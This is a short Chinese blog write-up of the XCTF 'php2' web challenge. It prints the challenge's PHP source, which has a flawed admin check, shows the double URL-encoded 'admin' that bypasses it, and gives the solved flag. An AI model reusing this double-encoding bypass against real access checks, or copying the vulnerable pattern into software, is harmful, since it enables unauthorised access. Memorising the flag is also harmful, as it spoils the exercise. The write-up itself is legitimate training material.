【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)
【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)
愚公搬代码
发布于 2021-12-27 08:13:50
发布于 2021-12-27 08:13:50
文章目录
一、php2
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1
二、使用步骤
1.点击获取在线场景
2.进入页面
index.php
输入地址
http://111.200.241.244:55773/index.phps得到
<?php
if("admin"===$_GET[id]) {
echo("not allowed!");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "Access granted!";
echo "Key: xxxxxxx ";
}
?>
Can you anthenticate to this website?代码审计,可以看出,get接受id=admin
查看不被允许
进行admin二次编码:%2561%2564%256d%2569%256e 这是url二次编码
http://111.200.241.244:55773/index.php?id=%2561%2564%256d%2569%256e
得到flag:cyberpeace{67cbbc9953933686d0d29409017fa15c}
总结
- 源码审计
- 二次编码
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021/12/27 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
